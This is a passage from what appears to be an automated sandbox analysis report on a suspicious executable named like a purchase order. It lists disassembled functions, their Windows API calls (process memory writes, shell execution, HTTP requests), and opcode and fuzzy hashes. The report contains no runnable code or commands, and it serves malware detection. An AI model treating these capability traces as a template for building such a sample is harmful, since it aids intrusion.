                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Path$ObjectStroke$DeleteFillSelect
                      • String ID:
                      • API String ID: 2625713937-0
                      • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                      • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                      • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                      • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                      Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0041780F
                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                      • __getptd.LIBCMT ref: 00417826
                      • __amsg_exit.LIBCMT ref: 00417834
                      • __lock.LIBCMT ref: 00417844
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                      • String ID:
                      • API String ID: 938513278-0
                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                      Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                      • ___set_flsgetvalue.LIBCMT ref: 00413D20
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                      • ExitThread.KERNEL32 ref: 00413D4E
                      • GetCurrentThreadId.KERNEL32 ref: 00413D54
                      • __freefls@4.LIBCMT ref: 00413D74
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                      • String ID:
                      • API String ID: 2403457894-0
                      • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                      • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                      • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                      • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                      Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                      • ExitThread.KERNEL32 ref: 004151ED
                      • __freefls@4.LIBCMT ref: 00415209
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                      • String ID:
                      • API String ID: 4247068974-0
                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                      Function 004624C5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 409COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: 5$8$^
                      • API String ID: 0-3622883839
                      • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                      • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                      • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                      • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                      Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID: )$U$\
                      • API String ID: 0-3705770531
                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                      Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 0046E505
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                      • CoUninitialize.OLE32 ref: 0046E53D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                      Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                      Download Yara Rule
                      Strings
                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                      • API String ID: 708495834-557222456
                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                      Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                      • String ID: @
                      • API String ID: 4150878124-2766056989
                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                      Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: \$]$h
                      • API String ID: 4104443479-3262404753
                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                      Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                      Download Yara Rule
                      APIs
                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • CloseHandle.KERNEL32(?), ref: 00457E09
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                      • String ID: <$@
                      • API String ID: 2417854910-1426351568
                      • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                      Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                      • String ID:
                      • API String ID: 3705125965-3916222277
                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                      Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem
                      • String ID: 0
                      • API String ID: 135850232-4108050209
                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                      Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: SysTreeView32
                      • API String ID: 847901565-1698111956
                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                      Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID: AU3_GetPluginDetails
                      • API String ID: 145871493-4132174516
                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
